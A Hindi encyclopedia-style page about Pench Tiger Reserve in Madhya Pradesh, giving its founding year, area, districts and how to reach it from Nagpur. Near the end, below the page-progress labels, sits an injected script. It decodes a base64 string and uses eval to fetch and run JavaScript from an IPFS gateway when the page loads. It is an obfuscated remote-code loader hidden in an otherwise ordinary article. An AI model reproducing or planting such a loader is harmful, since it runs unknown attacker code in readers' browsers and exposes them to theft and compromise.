पेंच बाघ अभयारण्य

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

पेंच बाघ अभयारण्य मध्य प्रदेश में स्थित कई बाघ अभयारण्यों में से एक है। इस अभयारण्य का नाम पेंच नदी के नाम पर रखा गया है।

  • पेंच नदी के नाम से बना और 1992 में गठित यह 'पेंच बाघ अभयारण्य' सतपुड़ा पर्वत श्रेणियों के दक्षिणी इलाकों में स्थित है।
  • यह अभयारण्य 1179.362 वर्ग कि.मी. पर फैला हुआ है, जिसके 411.33 वर्ग कि.मी. क्षेत्र पर अभयारण्य का विस्तार है।
  • अभयारण्य से बहती पेंच नदी इस अभयारण्य को छिंदवाड़ा और सिवनी, इन दो ज़िलों के बीच विभाजित कर देती है।
कैसे पहुँचे

'पेंच बाघ अभयारण्य' नागपुर और जबलपुर के बीच राष्ट्रीय राजमार्ग 7 पर खवासा शहर से 12 कि.मी. की दूरी पर है। निकटतम रेल और हवाई अड्डा नागपुर में स्थित है। खवासा शहर राष्ट्रीय राजमार्ग 7 पर नागपुर से 80 कि.मी. और जबलपुर अभयारण्य से 203 कि.मी. दूर है। नागपुर से 'कान्हा राष्ट्रीय उद्यान' के मार्ग पर यह स्थित है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख